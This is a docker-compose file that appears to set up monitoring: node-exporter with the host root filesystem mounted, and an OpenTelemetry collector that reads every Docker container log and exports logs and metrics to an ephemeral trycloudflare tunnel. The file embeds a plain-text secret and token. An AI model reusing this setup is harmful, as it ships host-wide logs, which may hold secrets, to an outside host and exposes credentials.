version: '3.8'
services:
  sentinel-rasp:
    image: caeshoru/sentinel-rasp:latest
    ports: ["8080:8081"]
    environment:
      - SENTINEL_SECRET=f0d64ad9fcd5c0cfbc2819e36d5dc5825777ef1434b57ae9aee2d30629b7d50c
      - SENTINEL_TOKEN=7aa0c4fb-e582-4638-b95f-6b7814962c13
      - SENTINEL_URL=https://dictionary-orders-timing-compatible.trycloudflare.com/upload-intelligence
      - INTERNAL_APP_URL=http://app:8080
      - REPO_NAME=RBS3/jee_library
      - REPO_VERSION=${REPO_VERSION:-unknown}

  node-exporter:
    image: prom/node-exporter:latest
    restart: unless-stopped
    volumes:
      - /proc:/host/proc:ro
      - /sys:/host/sys:ro
      - /:/rootfs:ro
    command:
      - '--path.procfs=/host/proc'
      - '--path.rootfs=/rootfs'
      - '--path.sysfs=/host/sys'

  otel-collector:
    image: otel/opentelemetry-collector-contrib:latest
    volumes:
      - /var/lib/docker/containers:/var/lib/docker/containers:ro
    entrypoint:
      - /bin/sh
      - -c
      - |
        cat <<EOF > /etc/otel-config.yaml
        receivers:
          prometheus:
            config:
              scrape_configs:
                - job_name: node-exporter
                  scrape_interval: 10s
                  static_configs:
                    - targets: ['node-exporter:9100']

          filelog:
            include: [ "/var/lib/docker/containers/*/*.log" ]
            start_at: beginning

        processors:
          resource:
            attributes:
              - key: repo
                value: "RBS3/jee_library"
                action: upsert
              - key: token
                value: "7aa0c4fb-e582-4638-b95f-6b7814962c13"
                action: upsert
              - key: version
                value: "${REPO_VERSION:-unknown}"
                action: upsert

          transform:
            log_statements:
              - context: log
                statements:
                  - set(attributes["signal_type"], "log")
                  - set(attributes["source_category"], "filelog")

          batch:
            timeout: 5s

        exporters:
          otlphttp/logs:
            endpoint: "https://dictionary-orders-timing-compatible.trycloudflare.com/v1/logs"
            headers:
              X-Sentinel-Token: "7aa0c4fb-e582-4638-b95f-6b7814962c13"
              X-Sentinel-Secret: "f0d64ad9fcd5c0cfbc2819e36d5dc5825777ef1434b57ae9aee2d30629b7d50c"
              bypass-tunnel-reminder: "true"

          otlphttp/metrics:
            endpoint: "https://dictionary-orders-timing-compatible.trycloudflare.com/v1/metrics"
            headers:
              X-Sentinel-Token: "7aa0c4fb-e582-4638-b95f-6b7814962c13"
              X-Sentinel-Secret: "f0d64ad9fcd5c0cfbc2819e36d5dc5825777ef1434b57ae9aee2d30629b7d50c"
              bypass-tunnel-reminder: "true"

        service:
          pipelines:
            logs:
              receivers: [filelog]
              processors: [resource, transform, batch]
              exporters: [otlphttp/logs]

            metrics:
              receivers: [prometheus]
              processors: [resource, batch]
              exporters: [otlphttp/metrics]
        EOF
        /otelcol-contrib --config=/etc/otel-config.yaml
